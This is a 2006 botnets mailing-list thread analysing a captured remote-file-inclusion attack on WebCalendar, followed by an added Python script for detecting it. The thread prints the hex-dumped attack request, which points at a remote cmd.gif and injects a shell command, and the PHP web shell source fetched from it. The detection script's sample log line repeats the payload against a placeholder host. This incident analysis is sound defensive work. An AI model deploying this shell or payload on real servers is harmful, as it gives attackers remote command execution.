To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Well given the trace I'd say this'll just sneak the output of 'which w'
into the output buffer. So a test to scan for injectability, maybe? I've
seen tests for injection in a bunch of attacks on twiki a while ago.

*shrug*

On Mon, 2006-03-20 at 07:08 -0600, [EMAIL PROTECTED] wrote:
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> ----------
> I found a web calendar overflow that pulled this URL:
> 
> http://www.datatrade.com/downloads/.../cmd.gif
> 
> Here is the full trace:
> 23:37:49.503772 IP 64.34.197.189.49278 > 192.168.10.10.80: P 
> 3981950149:3981950460(311) ack 205900033 win 5840 <nop,nop,timestamp 
> 4530592 0>
>       0x0000:  4510 016b 9d5b 4000 3706 d48f 4022 c5bd  E..k.[@.7...@"..
>       0x0010:  c0a8 0a0a c07e 0050 ed57 bcc5 0c45 c901  .....~.P.W...E..
>       0x0020:  8018 16d0 5fcf 0000 0101 080a 0045 21a0  ...._........E!.
>       0x0030:  0000 0000 4745 5420 2f2f 6361 6c65 6e64  ....GET.//calend
>       0x0040:  6172 2f74 6f6f 6c73 2f73 656e 645f 7265  ar/tools/send_re
>       0x0050:  6d69 6e64 6572 732e 7068 703f 696e 636c  minders.php?incl
>       0x0060:  7564 6564 6972 3d68 7474 703a 2f2f 7777  udedir=http://ww
>       0x0070:  772e 6461 7461 7472 6164 652e 636f 6d2f  w.datatrade.com/
>       0x0080:  646f 776e 6c6f 6164 732f 2e2e 2e2f 636d  downloads/.../cm
>       0x0090:  642e 6769 663f 2663 6d64 3d65 6368 6f3b  d.gif?&cmd=echo;
>       0x00a0:  7768 6963 6825 3230 773b 6563 686f 2048  which%20w;echo.H
>       0x00b0:  5454 502f 312e 310d 0a41 6363 6570 743a  TTP/1.1..Accept:
>       0x00c0:  202a 2f2a 0d0a 4163 6365 7074 2d4c 616e  .*/*..Accept-Lan
>       0x00d0:  6775 6167 653a 2065 6e2d 7573 0d0a 4163  guage:.en-us..Ac
>       0x00e0:  6365 7074 2d45 6e63 6f64 696e 673a 2067  cept-Encoding:.g
>       0x00f0:  7a69 702c 2064 6566 6c61 7465 0d0a 5573  zip,.deflate..Us
>       0x0100:  6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c  er-Agent:.Mozill
>       0x0110:  612f 342e 3020 2863 6f6d 7061 7469 626c  a/4.0.(compatibl
>       0x0120:  653b 204d 5349 4520 362e 303b 2057 696e  e;.MSIE.6.0;.Win
>       0x0150:  2e6f 7267 0d0a 436f 6e6e 6563 7469 6f6e  .org..Connection
>       0x0160:  3a20 436c 6f73 650d 0a0d 0a              :.Close....
> 
> When I look at the download file (cmd.gif) it doesn't seem to be complete:
> 
> <?
>   if (isset($chdir)) @chdir($chdir);
>   ob_start();
>   passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
>   $output = ob_get_contents();
>   ob_end_clean();
>   if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
> 
> ?>
> 
> 
> So I am figuring this to be an attack directly against webcalendar and 
> not a php injection to build up a botnet. Any input from the crew?
> 
> tc

Cheers,
Christian.
-- 
________________________________________________________________________
                                          http://www.cl.cam.ac.uk/~cpk25
                                                    http://www.whoop.org
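As an added example for this thread (not code from the list, from tc or from WebCalendar), the following Python script does what the discussion above does by hand: it reassembles the HTTP request from a tcpdump -X dump, strips the IP and TCP headers using their own length fields, and flags query parameters that point at a remote URL (the remote-include vector) or carry shell metacharacters (the `echo;which w;echo` probe). The same check is then run over web-server access-log lines, which is where a defender would normally look for this pattern. The dump lines are taken from the quoted message (its 0x0130 and 0x0140 lines are missing, so reassembly stops at that gap and reports it); the access-log lines and the attacker.example host are constructed for the example.

```python
"""Reassemble an HTTP request from a tcpdump -X hex dump and flag
remote-file-inclusion / command-injection indicators in the query string.

Added example, not code from the botnets list or from WebCalendar.
"""
import re
from urllib.parse import unquote

# tcpdump -X line: "0xNNNN:  hhhh hhhh ... hhhh  <ascii column>"
# The ASCII column is separated from the hex groups by two spaces, which
# is what stops the greedy hex match from swallowing it.
HEX_LINE = re.compile(r"^\s*0x([0-9a-f]+):\s+((?:[0-9a-f]{2,4} )*[0-9a-f]{2,4})", re.I)

# A parameter value starting with one of these is a remote include candidate.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")
SHELL_META = re.compile(r"[;|`$&]")

# Combined/common access-log request field: "METHOD target HTTP/x.y"
LOG_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Hex dump copied from the quoted capture (0x0130 and 0x0140 are absent there).
DUMP = """\
    0x0000:  4510 016b 9d5b 4000 3706 d48f 4022 c5bd  E..k.[@.7...@"..
    0x0010:  c0a8 0a0a c07e 0050 ed57 bcc5 0c45 c901  .....~.P.W...E..
    0x0020:  8018 16d0 5fcf 0000 0101 080a 0045 21a0  ...._........E!.
    0x0030:  0000 0000 4745 5420 2f2f 6361 6c65 6e64  ....GET.//calend
    0x0040:  6172 2f74 6f6f 6c73 2f73 656e 645f 7265  ar/tools/send_re
    0x0050:  6d69 6e64 6572 732e 7068 703f 696e 636c  minders.php?incl
    0x0060:  7564 6564 6972 3d68 7474 703a 2f2f 7777  udedir=http://ww
    0x0070:  772e 6461 7461 7472 6164 652e 636f 6d2f  w.datatrade.com/
    0x0080:  646f 776e 6c6f 6164 732f 2e2e 2e2f 636d  downloads/.../cm
    0x0090:  642e 6769 663f 2663 6d64 3d65 6368 6f3b  d.gif?&cmd=echo;
    0x00a0:  7768 6963 6825 3230 773b 6563 686f 2048  which%20w;echo.H
    0x00b0:  5454 502f 312e 310d 0a41 6363 6570 743a  TTP/1.1..Accept:
    0x00c0:  202a 2f2a 0d0a 4163 6365 7074 2d4c 616e  .*/*..Accept-Lan
    0x00d0:  6775 6167 653a 2065 6e2d 7573 0d0a 4163  guage:.en-us..Ac
    0x00e0:  6365 7074 2d45 6e63 6f64 696e 673a 2067  cept-Encoding:.g
    0x00f0:  7a69 702c 2064 6566 6c61 7465 0d0a 5573  zip,.deflate..Us
    0x0100:  6572 2d41 6765 6e74 3a20 4d6f 7a69 6c6c  er-Agent:.Mozill
    0x0110:  612f 342e 3020 2863 6f6d 7061 7469 626c  a/4.0.(compatibl
    0x0120:  653b 204d 5349 4520 362e 303b 2057 696e  e;.MSIE.6.0;.Win
    0x0150:  2e6f 7267 0d0a 436f 6e6e 6563 7469 6f6e  .org..Connection
    0x0160:  3a20 436c 6f73 650d 0a0d 0a              :.Close....
"""

# Constructed access-log lines; attacker.example is a placeholder host.
ACCESS_LOG = [
    '10.0.0.5 - - [20/Mar/2006:23:37:49 -0600] "GET /calendar/tools/send_reminders.php'
    '?includedir=http://attacker.example/cmd.gif?&cmd=echo;which%20w;echo HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '10.0.0.6 - - [20/Mar/2006:23:38:01 -0600] "GET /calendar/month.php?year=2006&month=03 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]


def reassemble(dump_lines):
    """Return (packet_bytes, truncated); stops at the first offset gap."""
    chunks = []
    for line in dump_lines:
        m = HEX_LINE.match(line)
        if m:
            chunks.append((int(m.group(1), 16), bytes.fromhex(m.group(2).replace(" ", ""))))
    chunks.sort()
    buf, truncated = bytearray(), False
    for offset, data in chunks:
        if offset != len(buf):      # missing line(s) in the dump
            truncated = True
            break
        buf += data
    return bytes(buf), truncated


def tcp_payload(pkt):
    """Skip the IPv4 and TCP headers using IHL and the TCP data offset."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6:
        raise ValueError("not TCP")
    data_off = (pkt[ihl + 12] >> 4) * 4
    return pkt[ihl + data_off:]


def classify_target(target):
    """Split a request target into path and decoded params; list findings."""
    path, _, query = target.partition("?")   # first '?' only: RFI URLs carry a second one
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[unquote(name)] = unquote(value)
    findings = []
    for name, value in params.items():
        if value.lower().startswith(REMOTE_SCHEMES):
            findings.append(f"remote file inclusion: {name}={value}")
        if SHELL_META.search(value):
            findings.append(f"shell metacharacters: {name}={value}")
    return {"path": path, "params": params, "findings": findings}


def analyze_dump(dump_lines):
    """Full pipeline for one tcpdump -X packet: bytes -> request line -> findings."""
    pkt, truncated = reassemble(dump_lines)
    request_line = tcp_payload(pkt).split(b"\r\n", 1)[0].decode("latin-1")
    method, target, version = request_line.split(" ", 2)
    result = classify_target(target)
    result.update(method=method, version=version, request_line=request_line, truncated=truncated)
    return result


def scan_access_log(lines):
    """Return [(line_number, findings)] for access-log lines that trip a check."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_REQUEST.search(line)
        if m:
            findings = classify_target(m.group("target"))["findings"]
            if findings:
                hits.append((n, findings))
    return hits


if __name__ == "__main__":
    r = analyze_dump(DUMP.splitlines())
    print(r["request_line"], "| truncated dump:", r["truncated"])
    for f in r["findings"]:
        print(" -", f)
    for n, fs in scan_access_log(ACCESS_LOG):
        print(f"access log line {n}: {fs}")
```

The target is split on the first `?` by hand rather than with `urllib.parse.urlsplit`, because the request line here starts with `//calendar/...` and `urlsplit` would read `calendar` as a host; the included URL's own trailing `?` is what lets the attacker's `cmd` parameter ride along to the fetched script, so it must stay inside the `includedir` value.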

_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets